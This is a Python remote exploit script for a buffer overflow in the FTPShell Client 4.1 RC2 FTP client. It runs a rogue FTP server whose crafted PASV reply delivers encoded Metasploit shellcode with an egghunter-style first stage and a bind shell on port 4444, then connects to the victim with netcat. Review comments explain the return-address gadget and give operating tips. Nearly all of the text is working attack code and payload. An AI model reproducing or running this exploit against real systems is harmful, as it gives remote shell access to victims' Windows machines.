
# Title : FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
# Published : 2009-09-09
# Author : His0k4


#!/usr/bin/python
# _  _   _         __    _     _ _  
#| || | (_)  ___  /    | |__ | | | 
#| __ | | | (_-< | () | | / / |_  _|
#|_||_| |_| /__/  __/  |__   |_| 
#
#[+] Bug :	 FTPShell Client 4.1 RC2 Remote Buffer Overflow Exploit (univ)
#[+] Author :	 His0k4
#[+] Tested on : xp_sp3,w2k_sp4
#[+] Greetz :	 All friends
#		 piece of "zlabiya"

#---exploit-log---
#attacker@dz-labs:~/pentests/fuzzers/ftp$ python FTPShell_client.py
#[+] Listening on [FTP] 21
#[+] Connection accepted from: 192.168.1.3
#[+] Sending the malicious pasv response...
#[+] Done, wait for trying to connect to port 4444 on the target...
#
#(UNKNOWN) [192.168.1.3] 4444 (?) open
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\victim\Desktop>


import os
import subprocess
import time
from socket import *


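# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
# Second-stage payload: a Metasploit win32_bind shell (listens on TCP 4444 on
# the victim), PexAlphaNum-encoded so it survives the text-based FTP reply.
# It is prefixed with the 8-byte tag "Dz27Dz27" (first line); the 709-byte
# encoded shellcode follows, for 717 bytes in total.
# NOTE(review): stage2 is sent in a separate 227 line and does not sit in the
# overflowed buffer, so stage1 presumably scans memory for the tag and jumps
# here (egghunter style) -- not verified, it would need the blob decoded.
# The escaped form is restored here; the page had lost every backslash, which
# turned each "\xHH" byte into the three characters 'x','H','H'.
stage2 = (
    "\x44\x7A\x32\x37\x44\x7A\x32\x37"
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38"
    "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x34\x4e\x43\x4b\x58\x4e\x57"
    "\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x34\x4a\x31\x4b\x38"
    "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38"
    "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
    "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
    "\x46\x4f\x4b\x43\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48"
    "\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x50\x4b\x44"
    "\x4b\x58\x4f\x45\x4e\x41\x41\x50\x4b\x4e\x43\x30\x4e\x42\x4b\x38"
    "\x49\x58\x4e\x56\x46\x52\x4e\x31\x41\x36\x43\x4c\x41\x53\x4b\x4d"
    "\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48"
    "\x42\x37\x4e\x31\x4d\x4a\x4b\x38\x42\x44\x4a\x30\x50\x35\x4a\x36"
    "\x50\x48\x50\x44\x50\x50\x4e\x4e\x42\x45\x4f\x4f\x48\x4d\x48\x46"
    "\x43\x55\x48\x46\x4a\x46\x43\x43\x44\x33\x4a\x56\x47\x57\x43\x57"
    "\x44\x43\x4f\x55\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e"
    "\x4e\x4f\x4b\x53\x42\x35\x4f\x4f\x48\x4d\x4f\x45\x49\x48\x45\x4e"
    "\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x50\x45\x55\x4c\x56\x44\x30"
    "\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
    "\x4f\x4f\x48\x4d\x43\x35\x43\x35\x43\x35\x43\x35\x43\x55\x43\x54"
    "\x43\x55\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x51"
    "\x4e\x55\x48\x46\x43\x55\x49\x38\x41\x4e\x45\x39\x4a\x36\x46\x4a"
    "\x4c\x51\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
    "\x41\x35\x45\x55\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x52"
    "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x55\x4f\x4f\x42\x4d"
    "\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x44\x47\x55\x4f\x4f\x48\x4d"
    "\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
    "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x55"
    "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x36\x48\x46\x4a\x56\x43\x36"
    "\x4d\x36\x49\x58\x45\x4e\x4c\x46\x42\x35\x49\x55\x49\x52\x4e\x4c"
    "\x49\x58\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x42\x50\x4f\x44\x34\x4e\x32"
    "\x43\x39\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
    "\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x54\x4f\x4f"
    "\x48\x4d\x4b\x55\x47\x55\x44\x35\x41\x45\x41\x35\x41\x55\x4c\x46"
    "\x41\x30\x41\x55\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x36"
    "\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"
    "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
    "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
    "\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x43\x55\x4f\x4f\x48\x4d"
    "\x4f\x4f\x42\x4d\x5a"
)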

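# First-stage payload, 141 bytes: the only code that fits inside the overflow.
# NOTE(review): stage2 is sent in its own 227 line prefixed with the 8-byte tag
# "Dz27Dz27", so this stage presumably walks memory for that tag and jumps to it
# (egghunter style) -- not verified, it would need the PexAlphaNum blob decoded.
# The escaped form is restored here; the page had lost every backslash, which
# turned each "\xHH" byte into the three characters 'x','H','H'.
stage1 = (
    #[*] Using Msf::Encoder::PexAlphaNum with final size of 141 bytes
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x48\x36\x41\x38\x4c\x4c"
    "\x4f\x4f\x4f\x50\x44\x34\x44\x55\x4c\x46\x44\x50\x4a\x35\x4d\x4c"
    "\x50\x52\x4e\x33\x45\x30\x4c\x35\x46\x37\x4f\x4e\x4a\x4b\x46\x54"
    "\x4c\x47\x44\x43\x47\x33\x4b\x58\x4c\x4f\x4f\x4a\x45\x37\x4c\x4e"
    "\x4f\x4a\x45\x57\x47\x4e\x4f\x4f\x47\x4e\x4c\x50\x5a"
)


# Overflow buffer (416 bytes): stage1, 'A' filler up to offset 412, then the
# 4-byte little-endian return address 0x0043B3C5 (an `add esp,8 ; retn`
# gadget). The address sits in the 0x00400000 image range, so it is
# presumably the FTPShell executable itself, which is not randomised on the
# XP/2k targets listed above -- hence "univ". Its high byte is 0x00; if the
# vulnerable copy is string-based that also ends the copy, which is one reason
# the address has to be the last thing in the buffer. (The name shadows the
# Python 2 builtin buffer(); kept because the PASV reply below refers to it.)
buffer = stage1
buffer += "\x41" * (412 - len(stage1))   # pad up to the return address
buffer += "\xC5\xB3\x43\x00"            # 0x0043B3C5: add esp,8 ; retn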


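def _exchange(conn, reply):
    """Send one FTP reply line and wait for the client's next command.

    The dialogue below is a fixed script: it expects USER, PASS, PWD, TYPE and
    PASV in that order and never parses what the client actually sent (see the
    commented-out CWD step).  The received command is therefore echoed so an
    out-of-sync client is visible to the operator.

    Raises SystemExit when recv() returns '' -- the client has hung up, and
    every later send() would only die with a broken-pipe traceback.
    """
    conn.send(reply)
    cmd = conn.recv(1024)
    if not cmd:
        raise SystemExit("[-] Client disconnected before the PASV request")
    print("[<] %r" % (cmd.strip(),))
    return cmd


# NOTE(review): binding 0.0.0.0:21 needs root (privileged port) and hands the
# payload to the FIRST host that connects, not necessarily the intended victim.
# On a shared lab network bind to the one interface the target will use.
s = socket(AF_INET, SOCK_STREAM)
# Without this a re-run right after a failed attempt fails with EADDRINUSE
# while the previous connection sits in TIME_WAIT.
s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 21))
s.listen(1)
print("[+] Listening on [FTP] 21")
c, addr = s.accept()

print("[+] Connection accepted from: %s" % (addr[0]))

try:
    _exchange(c, "220 Hey victim batet fik!\r\n")
    time.sleep(0.5)
    _exchange(c, "331 User anonymous OK Password required\r\n")
    time.sleep(0.5)
    _exchange(c, "230 Ok.\r\n")

    # Enable this when the client performs a CWD command
    #time.sleep(1)
    #_exchange(c, "250 CWD command successful.\r\n")

    time.sleep(0.5)
    _exchange(c, "257 \x22/\x22 is current directory\r\n")
    time.sleep(0.5)
    _exchange(c, "200 Type set to A.\r\n")
    time.sleep(0.5)
    print("[+] Sending the malicious pasv response...")
    # Two 227 replies in one send: the first carries stage2 (tag + bind-shell
    # payload), presumably so it is resident in the client's memory when stage1
    # runs; the second is the overflowing "Entering Passive Mode" line built
    # from stage1 plus the return address.
    c.send("227 " + stage2 + "\r\n"
           "227 Entering Passive Mode (" + buffer + ").\r\n"
           "\r\n")
    time.sleep(2)   # let the client read the reply before the socket goes away
finally:
    # Close both sockets on every path, including the SystemExit above.
    c.close()
    s.close()

print("[+] Done, wait for trying to connect to the target on port 4444...\n")
time.sleep(25)
# win32_bind: the payload listens on the victim, so we connect out to it.
# Argument list instead of a shell string -- addr[0] is a kernel-supplied
# dotted quad, so injection is not realistic, but nothing should go through
# /bin/sh anyway.
subprocess.call(["nc", "-nv", addr[0], "4444"])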
